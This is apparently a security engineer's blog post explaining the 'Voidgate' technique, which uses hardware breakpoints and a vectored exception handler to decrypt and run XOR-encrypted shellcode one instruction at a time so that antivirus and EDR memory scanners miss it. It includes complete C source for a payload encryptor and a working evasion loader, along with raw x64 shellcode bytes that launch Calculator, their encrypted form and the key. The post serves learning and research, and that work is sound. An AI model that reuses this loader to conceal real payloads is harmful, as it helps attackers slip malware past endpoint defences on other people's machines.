Voidgate: how to execute shellcode while keeping it encrypted

Sohail Saha
10 min readSep 28, 2024

--

No matter how well you encrypt your shellcode, you would need to decrypt it fully to execute it. Many AV/EDR memory scanners take advantage of this to detect payloads by pattern-matching. But what if you could decrypt only one instruction at a time, execute it, then re-encrypt it back before moving to the next instruction?

That’s exactly what the Voidgate technique tries to do. I came across this technique a couple of days back, and it blew me away. I decided to write my own implementation from scratch, without looking at the original source-code, just for learning. The README hinted at things I needed to research on.

This article will cover all pre-requisite knowledge needed to understand Voidgate, followed by a demo of my POC.

Prerequisite concepts

Before we understand Voidgate, we need to understand certain concepts, as the technique requires use of them.

Hardware breakpoints

When you use a debugger to debug a program, you can set something called a “breakpoint”, that pauses execution at an address and gives you the chance to modify the execution context before resuming the execution. However, such breakpoints are implemented on a software level. In other words, your debugger software itself has to regularly check the instruction pointer to see if it matches against any entry in the breakpoint list.

However, the CPU itself can also set breakpoints, called “Hardware breakpoints”. Unlike the previous example of Software breakpoints, hardware breakpoints don’t need specific user-land softwares, and are thus debugger-agnostic. Upon detecting a hardware breakpoint, the CPU itself pauses execution of a thread, raises an exception, and allows the developer to handle the exception.

This entire process is achieved through “Debug registers”.

Debug Registers

Debug registers are special registers that are needed for Hardware breakpoints. There are 8 of them, named as Dr0-Dr7. Each of them serves a specific purpose.

Dr0-Dr3: The first 4 registers are called “Debug Address Registers”, and store the breakpoint addresses. Execution is paused when it reaches these 4 addresses. Yes, that means Hardware breakpoints can be set on at most 4 addresses.

Dr4-Dr5: These are reserved registers, and in most cases don’t need to tampered with. Under normal circumstances they are mapped to Dr6-Dr7.

Dr6: This register is called “Debug Status Register”, and contains information about the conditions under which the breakpoint event got triggered.

Dr7: This is called “Debug Control Register”, and as the name suggests, it controls which of the Dr0-Dr3 are enabled, and under what conditions.

The first 8 bits are used to control which of the Dr0-Dr3 are enabled. All odd bits correspond to G0-G3, and control whether the breakpoints are enabled globally. And the even bits correspond to L0-L3, and controls whether the breakpoints are enabled locally.

The last 16 bits control the conditions under which the hardware breakpoints trigger. Each of Dr0-Dr3 gets 4 bits for this.

From these 4 bits, the first 2 bits control the condition of the breakpoint. It is possible to generate an exception on instruction execution, data write, I/O read & write, and data read & write.

The last 2 bits specify the size of the memory location pointed to by the corresponding Debug Address Register. The available sizes are 1 byte, 2 bytes, 4 bytes and 8 bytes.

Vectored Exception Handlers

Structured Exception Handlers (SEH) are routines that are supposed to be executed when a software or hardware exception is encountered. The handler is supposed to either handle the exception (in which case the execution can resume as normal) or pass off the handling to the next-in-line exception handler. SEHs are frame-based. In other words, the handlers are registered only for a particular block of code. Once the block goes out of scope, so does the SEH.

Vectored Exception Handler (VEH) is an extension of SEH. Unlike SEHs, VEHs are global, in the sense that they are triggered for all exceptions raised by the application during its lifecycle, no matter which block of code raised it. A developer can register a VEH that selectively handles particular exception types, and passes off the rest to the next-in-line exception handlers.

VEHs can catch hardware breakpoints. They receive pointers to essential thread context and exception data. This means that VEHs can make changes to a thread’s execution context while handling the exception.

Voidgate

What is Voidgate?

Voidgate is a technique that dynamically decrypts just a few instructions of a shellcode at a time (at least 1, at most 3–4), executes it, then re-encrypts it back before moving on and doing the same with the next instructions.

Think of it like shining a flashlight in a dark room. Things that come under the light become visible, and everything around it remains invisible in the dark. Compare the light with decryption, and the dark with (re)encryption.

Memory scanning AV/EDRs will scan the memory to look for traces of payloads. No matter how well you encrypt your shellcode, traditional execution techniques would have you decrypt all of it before execution. And that’s precisely when these AV/EDRs catch it.

But with Voidgate, since only 0–4 instructions of the whole shellcode is decrypted at any point of time, memory scanning will fail. It’s obviously difficult to write reliable signatures for 1–4 instructions of a shellcode, because such signatures will definitely cause very high false positives.

And that’s precisely the objective with Voidgate.

How does it actually work?

Well first, the shellcode actually needs to be encrypted. This is a pre-requisite.

Followed by this, the encrypted shellcode is taken to a read-write-executable memory. A new thread is created in suspended mode, with the start address pointed at the beginning of this shellcode. In addition to this, the thread context is modified — Dr0 and Dr7 are appropriately modified such that Dr0 contains the address of this shellcode, and the configuration in Dr7 enables it locally.

A VEH is also registered that specifically handles EXCEPTION_SINGLE_STEP raised from within our shellcode, and passes off any other exceptions to the next-in-line handlers. Since the VEH is triggered before the actual execution, it gets the chance to perform decryption of the target instruction(s) at which the hardware breakpoint occurs.

After this decryption, it sets the Trap Flag (TF) and Resume Flag (RF) in the thread context, in the EFlags register. The TF is so that the same exception is fired again at the next instruction even if there’s no Debug Address Registers set on it (because remember, we only stored the address of the beginning of the shellcode in Dr0, and not, say the 2nd instruction at offset +1). The RF is set so that the execution moves ahead, and is not stuck in a loop. With this arrangement, we would be essentially stepping-through our shellcode (one-instruction at a time).

After the above, the VEH returns EXCEPTION_CONTINUE_EXECUTION , signalling the thread to continue the execution of the decrypted instructions.

In case the exception is raised from anywhere other than the first instruction, the VEH would re-encrypt previous instruction(s) before doing the decryption as stated above.

The VEH would decrypt/re-encrypt N bytes of shellcode at a time, where N is the maximum length of an instruction in the target system. For example, N would be 16 in x64 systems. What that means is, if it happens that the N bytes accomodate 3 instructions, it would process those 3 instructions, even if the thread executes only the 1.

The instruction pointer (which can be derived from the thread context received by the VEH) would tell us the address of the instruction that the thread is supposed to execute after the VEH handles the exception. So if the exception is fired from, say, address 0xA, the instruction pointer would have 0xA. We would need to decrypt data at address 0xA all the way to 0x1A (16 bytes) before VEH returns.

Next, if the exception is fired from 0xB, the VEH must re-encrypt data at addresses 0xA-0x1A, before decrypting data at addresses 0xB-0x1B (16 bytes again). Thus, for the re-encryption, it is necessary to save the instruction pointer, so that it can be used in the next cycle’s re-encryption stage.

With this, the suspended thread is resumed, and the VEH is triggered on each instruction.

Technical implementation

First, we need to encrypt a shellcode for a POC. I used this shellcode that pops calculator. I used XOR-encryption to implement a one-time pad.

#include "Windows.h"
#include "immintrin.h"
#include "stdio.h"

// Function to generate random N-bytes
void GenerateRandomBytes(IN DWORD n, OUT PVOID pBuf) {
// Zero memory
for (int i = 0; i < n; i++) {
((PCHAR)pBuf)[i] = '\x00';
}

// Keep generating random 8 bytes and fit them in output buffer
unsigned long long bytes = 0;
DWORD nRemaining = n % 8;
DWORD nClosest = n - nRemaining;
for (int i = 0; i < nClosest; i += 8) {
_rdrand64_step(&bytes);
for (int j = 0; j < 8; j++) {
((PCHAR)(pBuf))[i + j] = ((PCHAR)(&bytes))[j];
}
}

// If there are bytes remaining that don't fit in 8 bytes blocks, do them individually in the end
if (nClosest != n) {
_rdrand64_step(&bytes);
for (int i = 0; i < nRemaining; i++) {
((PCHAR)(pBuf))[nClosest + i] = ((PCHAR)(&bytes))[i];
}
}
}

// Function to XOR-encrypt N-bytes (one time pad) in-place
void XorEncrypt(IN PCHAR pBuf, IN PCHAR pKey, IN DWORD pBufSize) {
for (int i = 0; i < pBufSize; i++) {
pBuf[i] = pBuf[i] ^ pKey[i];
}
}

// Function to print out buffer
void PrintBuffer(IN PCHAR pBuf, IN DWORD pBufSize) {
for (int i = 0; i < pBufSize; i++) {
printf("\\x%02X", (unsigned char)pBuf[i]);
}
}

void main() {
// Payload to use (pops calc; https://github.com/boku7/x64win-DynamicNoNull-WinExec-PopCalc-Shellcode/blob/main/win-x64-DynamicKernelWinExecCalc.asm)
unsigned char payloadToEncrypt[] =
"\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b"
"\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2"
"\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b"
"\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04"
"\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0"
"\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2"
"\x48\x83\xec\x20\x41\xff\xd6";
const unsigned int payloadToEncryptLen = 205;

// Generate encryption key
PCHAR pXorKey = VirtualAlloc(NULL, payloadToEncryptLen, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
if (pXorKey == NULL) return;
GenerateRandomBytes(payloadToEncryptLen, pXorKey);

// Encrypt payload
XorEncrypt(payloadToEncrypt, pXorKey, payloadToEncryptLen);

// Print out results
printf("const unsigned char payloadXorEncrypted[] = \"");
PrintBuffer(payloadToEncrypt, payloadToEncryptLen);
printf("\";\n");

printf("const unsigned char xorDecryptionKey[] = \"");
PrintBuffer(pXorKey, payloadToEncryptLen);
printf("\";\n");

printf("const unsigned int payloadAndKeyLen = %d;\n", payloadToEncryptLen);

// Cleanup
VirtualFree(pXorKey, 0, MEM_RELEASE);
}

This generates a random key of the same length as the shellcode, that XOR-encrypts the shellcode with it. The key, encrypted shellcode and their length is printed. We are going to use it in the Voidgate POC.

With understanding about the Voidgate technique, here’s my POC:

#include "Windows.h"
#include "immintrin.h"
#include "stdio.h"

// Global data for payload
const unsigned char payloadXorEncrypted[] = "\xBC\xF3\x16\xEF\xD4\x51\x6E\x4E\x42\x4D\x49\xAE\xFC\xBC\xD3\x9F\x2C\xF0\xCC\x56\x30\x5D\x37\x7F\xB3\x7E\xC7\xAA\x21\xD2\x9A\xB5\x91\x4B\x5A\x18\xDB\x0C\xC8\x0F\x76\x6E\x3F\x85\x12\xEE\x6D\xFD\x38\x46\x73\x24\xC4\x3D\x7A\x7F\x8B\xFC\x97\xB0\x6F\xF0\xBD\xDF\x71\xFC\x95\xE0\xEF\xE6\x41\x54\x93\x65\xE6\xFD\x4D\x58\xA8\x44\x38\x30\x2C\x23\xB1\xDA\x6D\x67\x32\xC0\xE1\x1A\x37\xEC\xFA\xDB\x60\x7B\xEF\x86\x34\x72\x20\x84\x1C\x31\x76\x08\xAD\x5F\xF6\x3B\x0E\x6C\x54\x24\x37\xB0\x8D\x56\x6E\xE9\x4B\x8F\x8D\x69\x63\x5F\x4B\x88\x06\xC1\xFD\xF2\xFD\xCA\x0C\x1B\x6C\x19\x52\xB0\x55\x15\xBA\xFC\x03\x33\xD3\x5A\x64\xDD\x53\x97\xE9\x9B\xCB\xFB\x47\x3F\xBF\xFB\x82\x93\x7D\x0F\xAC\xA3\xAE\x66\x25\x5C\x52\xAF\x88\x12\xEE\x7E\x76\x4B\x6C\x95\x77\x05\xCE\xA2\x8E\xD0\x40\x0B\x87\xBC\x83\x14\x42\x52\x3A\x8F\x3E\xB5\x3B\xF2\xA3\xDE\x98";
const unsigned char xorDecryptionKey[] = "\xF4\xC2\xE9\xA7\x23\xB6\x0B\x06\xC9\x15\x29\xE6\x77\xE7\xCB\xD7\xA7\xAB\xEC\x1E\xBB\x46\x7F\xF4\xA8\x36\x4C\xF1\x01\x9B\x13\x6D\x1A\x10\x66\x54\xDA\xCF\x80\x3E\xBF\x08\xBE\x44\xED\x66\x25\x3C\xD1\x4E\xF8\x30\xCF\x71\x7B\xBD\xC6\xCD\x45\xF4\xE4\xA2\xA1\x92\x70\x3E\xD8\xD1\x34\xA2\xCA\x0E\xB3\x28\xE7\x3E\x00\x69\x4C\x00\xB3\x52\x08\x6E\xB0\x1E\x86\x55\x69\x99\xA9\x2B\xF7\xA4\x73\x39\x31\x33\x64\x8A\x10\x3A\x11\x7B\x5D\xBA\x4A\x8B\xE1\x5E\x31\x73\x87\xBA\xA7\x82\x43\xB5\xC5\xA9\xAE\x02\xAD\xD6\xEB\x28\xE8\x5B\x0F\xC9\x8D\xC5\x7F\xBE\xFC\x0A\x5F\xD8\x24\x28\x9B\x30\x94\x12\xF2\x44\x0C\x9B\x45\xCB\xDE\x5A\xC9\x0B\xA1\x6C\x1B\xB3\x86\xD7\xB7\xAB\xD3\x7B\xCD\xF0\x53\x5C\xE7\xEF\xE3\x14\x63\x66\xC0\xE5\x0F\x2E\x3E\xF3\xF0\x0B\xE4\x99\x1F\x38\x09\x4A\x08\xFC\x57\xEC\xCB\x9D\xA3\x1A\xC5\x4D\x76\x36\xD7\xD2\xE2\x21\x4E";
const unsigned int payloadAndKeyLen = 205;

// Global data for Voidgate functions
const unsigned int maxInstructionLen = 16;
PVOID payloadXorEncryptedExecutable = NULL;

/*
Creates a thread to execute payload in
*/
HANDLE CreateThreadForPayload(IN PVOID pEncryptedPayload, IN OPTIONAL PDWORD pThreadId) {
// Initialise and create thread in suspended mode
HANDLE hThread = CreateThread(NULL, 0, pEncryptedPayload, NULL, CREATE_SUSPENDED, pThreadId);
if (hThread == NULL) return NULL;

// Set hardware breakpoint at start of payload
CONTEXT cThread = {.ContextFlags = CONTEXT_DEBUG_REGISTERS };
if (!GetThreadContext(hThread, &cThread)) return NULL;
cThread.Dr0 = pEncryptedPayload;

// Configure hardware breakpoint by modifying existing Dr7
const DWORD64 enableDr0 = (1 << 1) | (1 << 0); // 0th and 1st bits G0 and G1, must be enabled to enable Dr0
const DWORD64 compatbility1 = (1 << 8) | (1 << 9); // LE & GE must be enabled for older hardware
cThread.Dr7 |= enableDr0 | compatbility1;

// Set the modified thread context
if (!SetThreadContext(hThread, &cThread)) return NULL;

// Resume execution
ResumeThread(hThread);

// Return
return hThread;
}

/*
Handles the breakpoints for the payload; re-encrypts previous instruction and decrypts current instruction
*/
PVOID prevRip = NULL;
LONG HardwareBreakpointHandler(PEXCEPTION_POINTERS pExceptionPointers) {
// If exception came from our single-stepping from inside our payload
if (pExceptionPointers->ExceptionRecord->ExceptionCode == EXCEPTION_SINGLE_STEP) {

// If exception came from our payload, perform re-encryption and decryption before execution
if ((pExceptionPointers->ContextRecord->Rip >= (DWORD64)payloadXorEncryptedExecutable
&& pExceptionPointers->ContextRecord->Rip < (DWORD64)payloadXorEncryptedExecutable + payloadAndKeyLen)
&& (pExceptionPointers->ExceptionRecord->ExceptionAddress >= (DWORD64)payloadXorEncryptedExecutable
&& pExceptionPointers->ExceptionRecord->ExceptionAddress < (DWORD64)payloadXorEncryptedExecutable + payloadAndKeyLen)) {
PCONTEXT pcThread = pExceptionPointers->ContextRecord;

printf("Inside HardwareBreakpointHandler; rip: %p, offset: %d\n", (PVOID)(pcThread->Rip), pcThread->Rip - (DWORD64)payloadXorEncryptedExecutable);

// Re-encrypt previous instruction
if (prevRip != NULL) {
for (int i = 0; i < maxInstructionLen; i++) {
((unsigned char*)prevRip)[i] ^= xorDecryptionKey[(DWORD64)prevRip - (DWORD64)payloadXorEncryptedExecutable + i];
}
}

// Decrypt current instruction
for (int i = 0; i < maxInstructionLen; i++) {
((unsigned char*)(pcThread->Rip))[i] ^= xorDecryptionKey[pcThread->Rip - (DWORD64)payloadXorEncryptedExecutable + i];
}
prevRip = pcThread->Rip;

// Set Resume Flag (RF) in EFlags so we are not stuck in loop
pExceptionPointers->ContextRecord->EFlags |= 0x10000;

// Enabling TF (Trap Flag) in EFlags so that breakpoint handler is triggered for every instruction (step-through)
pExceptionPointers->ContextRecord->EFlags |= 0x0100;
}

// Execute current instruction
return EXCEPTION_CONTINUE_EXECUTION;
}
// If exception came from anywhere else, skip handling it
else {
printf("Unexpected exception from %p; exception code: %d\n", pExceptionPointers->ExceptionRecord->ExceptionAddress, pExceptionPointers->ExceptionRecord->ExceptionCode);
return EXCEPTION_CONTINUE_SEARCH;
}
}


void main() {
// Attach hardware breakpoint handler
HANDLE hVectoredExceptionHandler = AddVectoredExceptionHandler(0, (PVECTORED_EXCEPTION_HANDLER)&HardwareBreakpointHandler);
if (hVectoredExceptionHandler == NULL) return;

// Copy encrypted payload into executable memory
payloadXorEncryptedExecutable = VirtualAlloc(NULL, payloadAndKeyLen, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (payloadXorEncryptedExecutable == NULL) return;
RtlCopyMemory(payloadXorEncryptedExecutable, payloadXorEncrypted, payloadAndKeyLen);

// Create and start thread for payload, and attach hardware breakpoint to start address
HANDLE hThread = CreateThreadForPayload(payloadXorEncryptedExecutable, NULL);
if (hThread == NULL) return;

// Wait for thread and then close it
WaitForSingleObject(hThread, INFINITE);

// Cleanup
RemoveVectoredExceptionHandler(hVectoredExceptionHandler);
CloseHandle(hThread);
VirtualFree(payloadXorEncryptedExecutable, 0, MEM_RELEASE);
}

Running the above starts the decrypting->re-encrypting cycle that steps through each instruction in the shellcode. This bumps up the execution time of our shellcode, since there’s a huge encryption/decryption overhead now for each instruction.

But after waiting for the whole execution to finish, we do get our calculator.

You’ll find my full POC here:

Limitations

There’s an obvious problem with the implementation — if the shellcode references any other part of itself, it would fail, since this reference would return encrypted data, not the actual decrypted data.

This means Voidgate can only be used for position-independent shellcode for now.

Further read

Firstly, go read the README on the Voidgate repo at https://github.com/vxCrypt0r/Voidgate. They are trying to work on the above limitations.

Secondly, to know about Hardware breakpoints and debug registers in detail, read https://ling.re/hardware-breakpoints/. It’s an excellent article, and was a huge help to me.

References

--

--

Sohail Saha
Sohail Saha

Written by Sohail Saha

Security Engineer | OSCP, CRTO, CPTS, CDSA

Responses (1)